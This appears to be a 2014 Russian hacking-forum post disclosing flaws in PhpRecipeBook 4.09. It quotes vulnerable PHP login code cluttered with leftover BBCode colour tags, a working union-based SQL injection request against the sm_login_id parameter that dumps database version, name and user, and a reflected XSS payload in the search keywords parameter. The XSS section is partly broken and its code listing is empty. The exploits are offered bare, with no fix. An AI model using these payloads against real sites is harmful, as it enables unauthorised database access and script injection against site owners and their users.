06.05.2014, 15:36
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
PhpRecipeBook 4.09
SQL injection
Уязвимый post - параметр: sm_login_id
Заисимости: mq = off
Вектор: union-query
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_login_id'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_login_id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sm_password[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_password'[/COLOR][COLOR="#007700"]] ) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sm_password'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]// try login if they are passing us a login ID
[/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sm_login_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sm_password[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]addErrorMsg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$SMObj[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Login Failed! Please try again.'[/COLOR][COLOR="#007700"]));
}
}[/COLOR][/COLOR]
Функция login:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_autoLoginUser[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_autoLoginPasswd[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db_table_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_db_table_users[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]" WHERE user_login = '[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#DD0000"]' AND user_password = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
Exploit:
Сообщение от None
POST /phprecipebook/index.php HTTP/1.1
Host: 127.0.0.1
...
sm_login_id=
'union select concat_ws(0x3a,version(),database(),user()),2,3,4, 5,6,7,8,9,10+--+
&sm_password=antichat
: keywords
Заисимости: mq = off
Уязвимый код:
PHP код:
[COLOR="#000000"][/COLOR]">[/COLOR]
Exploit:
[127.0.0.1/phprecipebook/index.php?m=recipes&a=search&keywords= ">alert('Antichat')&search=yes]
|
|
|